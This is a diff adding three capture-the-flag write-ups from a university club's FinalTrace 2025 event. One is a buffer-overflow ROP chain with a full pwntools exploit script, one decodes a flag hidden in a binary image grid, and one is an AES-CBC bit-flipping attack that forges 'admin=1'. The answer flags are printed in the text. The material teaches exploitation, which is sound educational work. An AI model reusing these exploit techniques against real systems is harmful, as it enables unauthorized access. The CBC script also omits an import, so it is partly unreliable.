cyscomvit
diff --git a/‎website/writeups/FinalTrace_2025/01-doors-mechanism.md‎
Lines changed: 122 additions & 0 deletions b/‎website/writeups/FinalTrace_2025/01-doors-mechanism.md‎
Lines changed: 122 additions & 0 deletions
diff --git a/‎website/writeups/FinalTrace_2025/02-echo-in-black-white.md‎
Lines changed: 86 additions & 0 deletions b/‎website/writeups/FinalTrace_2025/02-echo-in-black-white.md‎
Lines changed: 86 additions & 0 deletions
diff --git a/‎website/writeups/FinalTrace_2025/03-do-you-know-xor-well-enough.md‎
Lines changed: 129 additions & 0 deletions b/‎website/writeups/FinalTrace_2025/03-do-you-know-xor-well-enough.md‎
Lines changed: 129 additions & 0 deletions
@@ -0,0 +1,122 @@
+---
+layout: writeup
+
+title: Door's Mechanism
+difficulty: Medium
+points: 500
+categories: [Pwn]
+tags: []
+
+flag: CYS{7h3_l45t_1nv0ca710n_ha5_b33n_5p0k3n_@789#!}
+---
+
+# Door's Mechanism
+
+> Author: Naresh
+- **Category**: Pwn
+
+
+## Challenge Description
+> Legends speak of a single spell that can unseal the ancient chamber. With one utterance, perform the invocation and witness what was meant to stay hidden.
+
+## Solution
+
+### Initial Analysis
+First, run `file` on the binary (`Last-Invocation`) to confirm it is a 64-bit ELF. 
+```bash
+$ file Last-Invocation
+Last-Invocation: ELF 64-bit LSB executable, ...
+```
+
+Next, run `checksec` to see what protections were enabled.
+
+```bash
+$ checksec Last-Invocation
+[*] 'Last-Invocation'
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    No canary found
+    NX:       NX disabled
+    PIE:      No PIE (0x400000)
+    RWX:      Has RWX segments
+```
+>No PIE indicates that the function addresses will be static.
+
+Running the binary and giving it a long string of 'A's causes a Segmentation fault, confirming the buffer overflow.
+
+### Tools Used
+- pwntools: For building and sending the exploit payload.
+- gdb (with pwndbg): For finding the offset and function addresses.
+- Ghidra: For static analysis and decompilation.
+- ropper: For finding the ROP gadgets.
+- checksec: For checking binary protections.
+### Step-by-Step Solution
+#### Step 1: Finding the Vulnerability and Offset
+Open the binary in GDB (with pwndbg) and use a cyclic(100) pattern to find the exact offset to control the return address.
+```bash
+gdb-pwndbg> r
+...
+Speak the Invocation:
+aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
+...
+Program received signal SIGSEGV, Segmentation fault.
+... 
+gdb-pwndbg> cyclic -l daaaaaaa
+24
+```
+The offset to overwrite the return address is 24 bytes.
+#### Step 2: Planning the ROP Chain
+The goal is to return to the `unseal_chamber` function, which will print the flag. This function can be easily found by decompiling the binary in Ghidra or by using gdb.
+
+To call it successfully, it requires two specific 64-bit integers as arguments:
+- `$rdi`(first argument) = `0xdeadc0dedeadc0de`
+- `$rsi` (second argument) = `0xc05c0377c05c0377`
+
+Use `ropper` to find the necessary ROP gadgets:
+```bash
+$ ropper --file Last-Invocation --search "pop rdi; ret"
+...
+0x000000000040119a: pop rdi; ret; 
+
+$ ropper --file Last-Invocation --search "pop rsi; pop r15; ret"
+...
+0x000000000040119c: pop rsi; pop r15; ret;
+```
+Use `gdb` to find the function address. 
+```bash
+gdb-pwndbg> p unseal_chamber
+$1 = (void (long, long)) 0x4011a3 <unseal_chamber>
+```
+The final ROP chain should look like this:
+- Padding: 24 bytes of junk (to fill the buffer)
+- Gadget 1: Address of `pop rdi; ret`
+- Argument 1: `0xdeadc0dedeadc0de`
+- Gadget 2: Address of `pop rsi; pop r15; ret`
+- Argument 2: `0xc05c0377c05c0377`
+- Argument 3: 8 bytes of junk (for pop r15)
+- Target: Address of `unseal_chamber`
+
+#### Step 3: Final Exploit Script
+Write a final exploit script using pwntools to automate this process.
+```python
+from pwn import *
+
+offset = 24
+pop_rdi = 0x000000000040119a
+pop_rsi_r15 = 0x000000000040119c
+param1 = 0xdeadc0dedeadc0de
+param2 = 0xc05c0377c05c0377
+unseal_chamber = 0x00000000004011a3
+
+p = remote("target_host", PORT)
+
+payload = b'A'*offset + p64(pop_rdi) + p64(param1) + p64(pop_rsi_r15) + p64(param2) + p64(0x00000000) + p64(unseal_chamber)
+
+p.recvline()
+p.sendline(payload)
+p.interactive()
+```
+Running this script against the binary will call the function with the correct arguments and print the flag.
+
+### Flag
+> CYS{7h3_l45t_1nv0ca710n_ha5_b33n_5p0k3n_@789#!}
@@ -0,0 +1,86 @@
+---
+layout: writeup
+
+title: Echo in Black & White
+difficulty: Medium
+points: 500
+categories: [Forensics]
+tags: []
+
+flag: CYS{7H3_H1DD3N_L4Y3R}
+---
+
+# Echo in Black & White
+
+## Challenge Information
+- **Title**: Echo in Black & White
+- **Category**: Forensics
+- **Difficulty**: Easy–Medium
+
+## Challenge Description
+What if complexity is just an illusion? Sometimes, the most ordinary patterns hold extraordinary secrets — if you learn to see them differently.
+The challenge is about observing the given image carefully — it may look random, but it hides a binary pattern where black represents 1 and white represents 0.
+Instead of overcomplicating it, try to read the pattern as bits, group them properly, and see what message it reveals.
+Sometimes, the simplest patterns lead you straight to the flag.
+
+## Hint
+the grid is 16*10 bits 
+## Solution
+
+### Initial Analysis
+The challenge image looked like a small QR-like binary grid.  
+Since the description mentioned interpreting colors as binary bits, the first idea was to treat each black pixel as **1** and each white pixel as **0**, then group them to extract ASCII text.
+
+### Tools Used
+- **Python**
+- **Pillow (PIL)** – for reading and resizing the image
+- **NumPy** – for pixel manipulation
+
+### Step-by-Step Solution
+
+#### Step 1: Load and Convert the Image
+```python
+from PIL import Image
+import numpy as np
+
+img = Image.open("download.png").convert("L")
+binary_img = (np.array(img) < 128).astype(np.uint8)  # Black = 1, White = 0
+```
+This converts the image to grayscale, then thresholds it so that each pixel is either 1 or 0.
+
+#### Step 2: Resize to Match the Hint Dimensions
+```python
+resized = np.array(Image.fromarray(binary_img * 255).resize((16, 10), Image.NEAREST))
+resized = (resized > 128).astype(np.uint8)
+```
+According to the challenge hint, the grid has **16 columns** and **10 rows**, so we resize it to that exact shape.
+
+#### Step 3: Extract Binary and Convert to ASCII
+```python
+ascii_text = ""
+for row in resized:
+    bits = "".join(map(str, row))
+    byte1, byte2 = bits[:8], bits[8:]
+    ascii_text += chr(int(byte1, 2)) + chr(int(byte2, 2))
+
+print(ascii_text)
+```
+Each row gives **16 bits** (2 ASCII characters of 8 bits each).  
+After converting the binary values to text, the decoded message appears as:
+
+```
+CYS{7H3_H1DD3N_L4Y3R}
+```
+
+### Flag
+```
+CYS{7H3_H1DD3N_L4Y3R}
+```
+
+## Lessons Learned
+- Binary-encoded patterns in images can directly store ASCII text.
+- Always check for pixel-level hints in Forensics challenges.
+- Knowing how to manipulate images programmatically is very useful in CTFs.
+
+## Resources
+- [Binary to ASCII Conversion Reference](https://www.rapidtables.com/convert/number/binary-to-ascii.html)
@@ -0,0 +1,129 @@
+---
+layout: writeup
+
+title: Do you know XOR well enough?
+difficulty: Medium
+points: 500
+categories: [General]
+tags: []
+
+flag: Dynamic Flag
+---
+
+# Do you know XOR well enough?
+
+ * Category: Cryptography
+ * Author: P C Guhan 
+
+## Description
+
+> Random numbers, AES encryption, SHA 256, HMAC, constant-time hash checking... what more do you want?
+> All are imported functions, hence highly secure
+> Or is it??
+
+## Solution
+![AES CBC Encryption](image.png)
+![AES CBC Decryption](image-1.png)
+
+This method uses the previous block to encrypt the next block. The same follows for decryption also. Hence, a bit flip will alter the plaintext.
+
+Each hex requires two characters. The length of "admin=0" is 7. 
+The hex output consists of the 16 bit IV and the 16 bit padded ciphertext. The IV is XOred with the decrypted ciphertext.
+
+To get admin=1, we XOR the 6th character block with 1.
+i.e. IV[6] ^ decrypted(message[6]) ^ 1 = 0 ^ 1
+since 0 ^ 1 = 1, 
+
+IV[6] ^ decrypted(message[6]) ^ 1 = 1
+giving us admin=1
+
+A corresponding hash can be generated as the hashing algorithm is open source.
+
+To mitigate this vulnerability while still using AES CBC mode, AEAD (Authenticated Encryption and Additional Data) must be used i.e. hashing with a secret key.
+
+## Script
+```python
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad, unpad
+from Crypto.Random import get_random_bytes
+import hashlib
+import hmac
+import random
+
+# --- setup (same as challenge) ---
+key = get_random_bytes(16)
+iv = get_random_bytes(16)
+
+part1 = "AES"
+part2 = ''.join(random.choices(string.ascii_uppercase, k=5))
+part3 = "AEAD"
+part4 = f"{random.randint(0, 999999):06d}"
+part5 = ''.join(random.choices(string.ascii_uppercase, k=3))
+flag = "CYS{" + f"{part1}_{part2}_{part3}_{part4}_{part5}" + "}"
+
+def encrypt_data(data):
+    cipher = AES.new(key, AES.MODE_CBC, iv)
+    enc = cipher.encrypt(pad(data.encode(), 16, style='pkcs7'))
+    return enc.hex()
+
+def decrypt_data(encryptedParams):
+    data = bytes.fromhex(encryptedParams)
+    if len(data) < 16:
+        raise ValueError("Ciphertext too short")
+    iv_in = data[:16]
+    ciphertext = data[16:]
+    cipher = AES.new(key, AES.MODE_CBC, iv_in)
+    paddedParams = cipher.decrypt(ciphertext)
+    plaintext = unpad(paddedParams, 16, style='pkcs7')
+    return plaintext.decode(errors='ignore')
+
+
+print("Just copy and paste? Hash is also given...")
+msg = "admin=0"
+print("\nCurrent authentication message is : " + msg)
+print("Turn it to admin=1")
+
+cipher_hex = encrypt_data(msg)
+iv_cipher = iv.hex() + cipher_hex
+print("\nEncryption of authentication message in hex : " + iv_cipher)
+
+
+hashed_value = hashlib.sha256(iv_cipher.encode('utf-8')).hexdigest()
+print("SHA-256: ", hashed_value)
+
+# -----------------------------
+# Solution
+# Reliable CBC bit-flip to change admin=0 -> admin=1
+# -----------------------------
+orig_msg = "admin=0"
+target_msg = "admin=1"
+
+p0 = pad(orig_msg.encode(), 16, style='pkcs7')[:16]
+p1 = pad(target_msg.encode(), 16, style='pkcs7')[:16]
+
+delta = bytes(a ^ b for a, b in zip(p0, p1))
+
+iv_prime = bytes(a ^ b for a, b in zip(iv, delta))
+
+enc_msg = iv_prime.hex() + cipher_hex
+enc_hash = hashlib.sha256(enc_msg.encode('utf-8')).hexdigest()
+
+
+# --- setup (same as challenge) ---
+try:
+    if hmac.compare_digest(hashlib.sha256(enc_msg.encode('utf-8')).hexdigest(), enc_hash):
+        final_dec_msg = decrypt_data(enc_msg)
+        print(final_dec_msg)
+
+        if "admin=1" == final_dec_msg:
+            print(flag)
+        else:
+            print('\nTry again you can do it!!')
+    else:
+        print("\nHashing failed")
+        print(hashlib.sha256(enc_msg.encode('utf-8')).hexdigest() + "\n\n")
+        print(enc_hash)
+except Exception as e:
+    print('\nbye bye!!', e)
+
+```